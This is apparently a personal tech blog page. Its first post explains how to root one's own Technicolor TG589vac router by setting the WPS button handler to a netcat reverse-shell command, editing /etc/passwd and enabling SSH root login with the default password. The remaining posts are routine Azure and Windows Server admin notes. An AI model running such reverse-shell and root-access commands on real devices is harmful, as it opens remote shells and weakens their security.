Tuesday, 15 May 2018

LAN side root on Technicolor MediaAccess TG589vac

Here is a method for gaining root access to your Technicolor TG589vac router (and probably other Technicolor models).

Unfortunately, this will only work on European models that ship with SSH and an engineer account enabled.

Tested working on firmware revision 17.2.0278

It's a bit more involved than the older methods but here goes:

First, set up a machine listening with netcat (make a note of its IP):

nc -lvvp 4444

Next, set up the WPS button handler to connect back to your listening machine. Log into the engineer account via SSH; the password is printed on the router's label as the access code.

get uci.button.button.@wps.handler
set uci.button.button.@wps.handler 'nc <IP ADDRESS> 4444 -e /bin/sh'
get uci.button.button.@wps.handler

Push the WPS button on the router (on the 589 it's the one on the side, visible in the image up top).

Congrats, you now have a root shell.

Once logged in, you can set up root login via SSH. The following reads the passwd file, then changes root's shell from /bin/false to /bin/ash:

cat /etc/passwd
sed -i "1s/\/bin\/false/\/bin\/ash/" /etc/passwd
cat /etc/passwd

Make sure the second output of the passwd file shows the correct root shell.

Next, configure dropbear to allow root login via SSH:

uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit

You then have to restart dropbear for the change to take effect:

/etc/init.d/dropbear restart

The root password is root :)

Log in via SSH and set a new root password:

root@dsldevice:~# passwd root
New password:
Retype password:
Password for root changed by root

Finally, set the WPS button handler back using UCI:

uci set button.wps.handler='wps_button_pressed.sh'
uci commit

Monday, 12 March 2018

StorSimple Upload Calculator

Some time ago, I played around with the on-premises Azure StorSimple virtual appliance. Unfortunately, I happened to pick the new blob storage account type in cool, RA-GRS mode. This has a very expensive "per 10k write" cost, and uploading 750 GiB of data ended up costing quite a bit of money.

Since then, we have seen Azure storage transaction costs come way down, especially on the v1 general purpose storage account type.

To help you get an estimate of storage and transaction costs for uploading bulk data into a StorSimple device, I've created a calculator here.

To begin, simply key in the amount of storage in GiB that you plan to upload, along with the per-10k-write and per-GB costs for your region, and the calculator will give a guide to the expected transaction and storage costs for uploading the data.

The calculator does not calculate transactions for day to day access, nor does it include cloud snapshot transactions or storage.

Be aware that the 512 KiB chunk size reduces transaction costs, but also significantly reduces deduplication. The Microsoft pricing page explains this.
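The calculator's arithmetic can be sketched roughly as below. This is my own sketch, not the calculator's actual code: the variable names are mine, the prices are placeholders rather than real Azure rates, and it treats GiB and GB interchangeably for the storage estimate.

```shell
#!/bin/sh
# Rough sketch of the upload cost estimate (placeholder prices, not real rates).
gib=750          # data to upload, in GiB
per10k="0.05"    # cost per 10,000 write transactions (placeholder)
pergb="0.02"     # cost per GB-month of storage (placeholder)

# StorSimple uploads in 512 KiB chunks, so 1 GiB = 2048 write transactions.
writes=$((gib * 2048))

txn_cost=$(awk -v w="$writes" -v p="$per10k" 'BEGIN { printf "%.2f", w / 10000 * p }')
storage_cost=$(awk -v g="$gib" -v p="$pergb" 'BEGIN { printf "%.2f", g * p }')

echo "write transactions: $writes"
echo "transaction cost:   $txn_cost"
echo "storage cost:       $storage_cost"
```

As in the calculator, this covers only the bulk upload itself, not day-to-day access or cloud snapshot costs.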

This first version of the calculator requires you to key in the per-10k-writes and per-GB costs for your chosen region and storage account type. It defaults to v1, LRS, North Europe, GBP costs as of the time of writing. I've purposely left out the currency symbol, as it should work with most currencies as-is.

Hopefully with some additional time, I'll be able to add a pull-down box to choose storage account type and location and have it automatically enter those costs for you.

Thursday, 8 March 2018

Windows Server 2012 R2 & 2016 updates showing as not applicable

Due to the Spectre and Meltdown patches causing problems with various antivirus vendors, Microsoft added a registry key check to ALL Windows Server patches for January and February 2018 (not just the Spectre and Meltdown patches).

If you find yourself in the situation where your servers are not detecting the latest update rollups, then check this Microsoft post:


Most AV vendors are properly setting this flag in the registry, but some do not, and if you have servers without AV for legitimate reasons, you may find yourself unable to patch those machines.

The server will simply not show the update rollups from WSUS or Microsoft Update servers. In WSUS, they will show as 'not applicable' for the server.

Setting the flag resolves the issue, but unless you are checking that servers are being updated properly, this may go unnoticed. In WSUS, since the updates are not applicable, the server will show as fully patched and not requiring the updates, which is a bad situation to be in.
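For reference, the flag in question is, to the best of my recollection, the QualityCompat registry key from Microsoft's advisory; verify the key path and GUID against the linked post before relying on this. On an affected server, it can be set from an elevated command prompt:

```shell
# Windows (elevated prompt): set the AV compatibility flag so the
# January/February 2018 updates are offered again.
# Check the GUID against Microsoft's advisory before using this.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" /v "cadca5fe-87d3-4b96-b7fb-a231484277cc" /t REG_DWORD /d 0 /f
```

After setting the key, the rollups should be detected on the next update scan.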

Friday, 9 February 2018

How to change backup retention for an Azure VM in Recovery Services Vault

This seemed a little bit hidden in the portal and I couldn't find any guides online. So, here is how to change the backup retention for an Azure virtual machine within the portal.

Hidden away here in the Azure Backup FAQ, Microsoft states:

"When a new policy is applied, schedule and retention of the new policy is followed. If retention is extended, existing recovery points are marked to keep them as per new policy. If retention is reduced, they are marked for pruning in the next cleanup job and subsequently deleted."

In other words, reducing retention will delete older backups when the policy is changed, while extending retention keeps existing backups according to the new policy.

How to change your policy

  • Log into the portal and find your Recovery Services Vault.

  • Click on the vault, then find 'Backup policies' in the menu blade.

  • Click '+ Add', select a policy type, fill in the policy details and click Create.

  • Once the policy is created, go back to the main Recovery Services Vault tab and click the vault.

  • Find 'Backup Items' in the menu blade.

  • Click Azure Virtual Machine.

  • Click on the VM you want to change.

  • Click the settings button.

  • Click 'Backup Policy'.

  • Choose the new backup policy and click Save.

Once the Deployments show as succeeded in the notifications area, go back to the 'Backup policies' blade from the start, click the policy, then click 'Associated Items' to check that the correct virtual machines have been assigned this policy.
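If you prefer scripting, the same policy change can likely be done with the Azure CLI. This is only a sketch: all of the names below (resource group, vault, container, item, policy) are hypothetical, and you should check `az backup item set-policy --help` in your environment, as the command surface may differ from what I remember.

```shell
# Sketch: reassign an Azure VM backup item to a different backup policy.
# All names below are hypothetical placeholders.
az backup item set-policy \
  --resource-group MyResourceGroup \
  --vault-name MyRecoveryVault \
  --container-name MyVmContainer \
  --name MyVmBackupItem \
  --policy-name NewRetentionPolicy
```

The same retention caveat from the FAQ quote above applies regardless of whether the change is made in the portal or via the CLI.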